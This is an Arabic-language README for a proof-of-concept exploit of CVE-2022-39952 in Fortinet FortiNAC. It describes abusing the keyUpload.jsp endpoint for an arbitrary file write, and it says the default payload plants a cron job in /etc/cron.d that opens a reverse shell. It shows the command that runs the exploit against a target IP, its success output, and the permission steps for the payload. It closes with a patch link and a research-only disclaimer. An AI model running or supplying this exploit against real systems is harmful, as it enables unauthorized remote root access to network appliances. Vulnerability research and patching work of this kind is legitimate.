
إثبات المفهوم لـ CVE-2022-39952
POC لـ CVE-2022-39952 الذي يؤثر على Fortinet FortiNAC
يقوم التكوين الافتراضي لهذا الاستغلال بكتابة مهمة cron لإنشاء شل عكسية. تأكد من تغيير ملف payload ليتناسب مع بيئتك.
يمكن العثور على تحليل تقني للسبب الجذري للثغرة ومؤشرات الاختراق على مدونتنا: https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs
يستغل هذا الـ POC نقطة النهاية keyUpload.jsp لتحقيق كتابة ملف عشوائية.
root@kali:~/CVE-2022-39952# python3 CVE-2022-39952.py --target 10.0.40.85 --file payload
[+] Wrote payload to /etc/cron.d/payload
[+] Payload successfully delivered
إذا كنت تستخدم حمولة تعتمد على cron، فتأكد من أن ملف الحمولة لديه الصلاحيات والمالك المناسبين:
sudo chown root:root payload
sudo chmod 0644 payload
قم بالتحديث إلى أحدث إصدار باتباع التعليمات الواردة في PSIRT https://www.fortiguard.com/psirt/FG-IR-22-300
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس الهدف منه مهاجمة الأنظمة إلا في الحالات المصرح بها صراحةً. القائمون على المشروع ليسوا مسؤولين أو ملزمين عن سوء استخدام البرنامج. استخدمه بمسؤولية.